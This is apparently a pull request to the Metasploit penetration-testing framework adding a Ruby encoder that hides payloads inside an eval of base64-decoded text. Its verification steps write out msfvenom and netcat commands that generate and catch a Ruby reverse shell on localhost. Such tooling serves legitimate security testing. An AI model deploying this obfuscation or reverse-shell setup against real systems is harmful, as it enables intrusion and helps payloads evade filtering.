### PR TITLE
Added base64 encoder for Ruby

### DIFF
--- a/modules/encoders/ruby/base64.rb
+++ b/modules/encoders/ruby/base64.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Encoder
   end
 
   def encode_block(state, buf)
-    ["(",")",".","%","e","v","a","l","u","n","p","c","k","m","0","f","i","r","s","t"].each do |c|
+    %w{( ) . % e v a l u n p c k m 0 f i r s t}.each do |c|
       raise BadcharError if state.badchars.include?(c)
     end
 

--- a/modules/encoders/ruby/base64.rb
+++ b/modules/encoders/ruby/base64.rb
@@ -1,0 +1,34 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+  Rank = GreatRanking
+
+  def initialize
+    super(
+      'Name'             => 'Ruby Base64 Encoder',
+      'Description'      => %q{
+        This encoder returns a base64 string encapsulated in
+        eval(%(base64 encoded string).unpack(%(m0)).first).
+      },
+      'Author'           => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'License'          => BSD_LICENSE,
+      'Arch'             => ARCH_RUBY)
+  end
+
+  def encode_block(state, buf)
+    ["(",")",".","%","e","v","a","l","u","n","p","c","k","m","0","f","i","r","s","t"].each do |c|
+      raise BadcharError if state.badchars.include?(c)
+    end
+
+    b64 = Rex::Text.encode_base64(buf)
+
+    state.badchars.each_byte do |byte|
+      raise BadcharError if b64.include?(byte.chr)
+    end
+
+    return "eval(%(" + b64 + ").unpack(%(m0)).first)"
+  end
+end


### PR DESCRIPTION
This PR adds a base64 encoder for Ruby. The encoding method is the same as the method used in lib/msf/core/payload/ruby.rb, however this encoder performs it on the entire payload.

## Verification

- [x] Run `msfvenom -p ruby/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -b "\x0a"`
- [x] Run `nc -vlp 4444`
- [x] Run generated ruby shellcode
- [x] Verify that you have received a shell through netcat.
